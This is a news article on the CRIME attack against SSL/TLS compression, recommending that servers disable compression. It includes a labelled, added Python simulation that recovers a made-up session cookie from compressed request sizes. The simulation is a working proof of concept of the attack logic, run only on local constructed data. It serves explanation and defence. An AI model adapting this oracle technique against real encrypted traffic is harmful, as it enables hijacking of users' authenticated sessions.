CRIME REVISITED

Many ways to break SSL with CRIME attacks, experts warn

Despite browser fixes, disabling SSL compression on servers may be best defense.

A hexadecimal representation of a compressed POST Web request. By changing characters in attacker-controlled data and comparing the sizes of the compressed requests that result, an attacker can recover the value of an encrypted authentication cookie one character at a time.

Security professionals are recommending that operators of websites offering the secure hypertext transfer protocol (HTTPS) disable the bandwidth-saving compression feature of the SSL/TLS layer to prevent a recently disclosed attack that permits the hijacking of encrypted browsing sessions.

As previously reported by Ars, current browsers from Microsoft, Google, Mozilla, Apple, and Opera aren't vulnerable to the exploit, dubbed CRIME, which is short for Compression Ratio Info-leak Made Easy. But until recently, both Chrome and Firefox users were susceptible to attacks that allowed hackers to decrypt secure cookies used to log in to e-mail and online bank accounts. The attack also requires a network position from which the sizes of the victim's encrypted requests can be observed, and a way to make the victim's browser send requests containing attacker-chosen data, for example from a page the attacker controls. Given the number of smaller browsers in use, and the possibility that some end users are running out-of-date software, website operators may want to proactively disable the compression used during sessions protected by the SSL, or secure sockets layer, protocol.

"It's clear that there are an uncountable number of ways to exploit the vulnerability if it is present," researchers for security firm iSEC Partners wrote in a recent blog post. "Rather than trying to block individual avenues to exploitation—which is likely impossible—we recommend you mitigate the issue at the source by disabling SSL Compression (and SPDY Compression, if used)."

SSL compression is turned on by default in Apache, the Internet's most widely used webserver application. It can be easily turned off in version 2.4.3, which added the SSLCompression directive, but the method for disabling it in the still widely used version 2.2 is less straightforward, the blog post warned. It's also unclear whether compression is supported by Amazon's Elastic Load Balancers. Microsoft's competing Internet Information Services doesn't support TLS compression at all. No advice was offered concerning server-side settings for SPDY. Whether a given server actually negotiates compression can be confirmed from a client: OpenSSL's s_client prints the negotiated compression method, or NONE, in its handshake summary.

The iSEC Partners blog post provides a simplified overview of how CRIME recovers the secret value of an encrypted cookie one character at a time. It works because the attacker-controlled part of a request (for example the URL path) and the cookie header added by the browser are compressed together before they are encrypted, and DEFLATE replaces repeated byte sequences with short back-references. The attacker triggers requests whose controlled input differs slightly each time and compares the sizes of the resulting compressed requests. When the input reproduces bytes that are also found in the cookie value, the repeated run is compressed away and the request comes out smaller. "An attacker who can observe the size of the SSL packets can use this technique in an adaptive fashion to learn the exact value of the cookie," the blog post explained.
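The adaptive size comparison described above, as an added example in Python that is not part of the Ars article or the iSEC post. It compresses a constructed HTTP request with zlib, lets the "attacker" choose only the request path, and recovers a constructed session cookie character by character from compressed sizes alone, using the "two tries" comparison: the guess placed directly after the known part can extend the back-reference to the real Cookie header, while the same bytes with junk in between cannot. Two simplifications are assumptions of this demo and not of the published attack: the compressor uses fixed Huffman codes (zlib's Z_FIXED strategy) so that one extra matched byte always shows up as exactly one byte less output, and the guess is written into the path directly rather than delivered through a cross-site request. The host name, cookie name and cookie value are made up.

```python
import zlib

# Constructed demo values (hypothetical; not from the article or the iSEC post).
SECRET_COOKIE = "7f3a9c1e5b2d"          # value the attacker wants; the browser attaches it
COOKIE_PREFIX = "Cookie: session_id="   # header text the attacker already knows
HEX = "0123456789abcdef"                # alphabet of the cookie value
PAD = "~^*!"                            # junk that appears nowhere else in the request


def build_request(path: str, cookie_value: str) -> bytes:
    """Browser side: the attacker picks the path, the browser adds the victim's
    cookie header. Only the path varies between requests."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        "Host: bank.example\r\n"
        f"{COOKIE_PREFIX}{cookie_value}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("ascii")


def compressed_size(plaintext: bytes) -> int:
    """Network observer's view: TLS encrypts the record but does not hide its
    length, so the size of the DEFLATE output leaks. Z_FIXED (static Huffman
    codes) is a demo simplification: it makes one extra matched byte cost
    exactly one byte less. Real servers use dynamic codes, which blur the
    signal and force the attacker to repeat measurements."""
    z = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS, 8, zlib.Z_FIXED)
    return len(z.compress(plaintext) + z.flush())


def oracle(path: str) -> int:
    """Everything the attacker learns per request: the compressed record size."""
    return compressed_size(build_request(path, SECRET_COOKIE))


def recover_cookie(size_of, prefix: str, alphabet: str, max_len: int = 64) -> str:
    """Adaptive recovery with the 'two tries' comparison. Both tries contain
    the same bytes, so they compress to the same size unless the guess placed
    right after the known part extends the LZ77 match with the real Cookie
    header. Stops when no candidate wins, i.e. at the end of the value."""
    known = ""
    while len(known) < max_len:
        hit = None
        for c in alphabet:
            adjacent = size_of("/" + prefix + known + c + PAD)    # guess can extend the match
            separated = size_of("/" + prefix + known + PAD + c)   # same bytes, guess isolated
            if adjacent < separated:
                hit = c
                break
        if hit is None:
            break
        known += hit
    return known


if __name__ == "__main__":
    print("recovered:", recover_cookie(oracle, COOKIE_PREFIX, HEX))
```

With fixed Huffman codes the correct candidate is always exactly one byte smaller than its separated twin and every wrong candidate is the same size, so the loop needs at most two requests per candidate per position. Against a real deflate stream the entropy coder shifts with every change in content, which is why the published attack compares paired requests and repeats them rather than trusting a single size. Disabling SSL compression, as the article recommends, removes the dependency between content and size entirely: the two tries then always produce records of identical length.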

Researchers Juliano Rizzo (@julianor) and Thai Duong are scheduled to demonstrate the CRIME attack on Friday at the Ekoparty security conference in Buenos Aires.
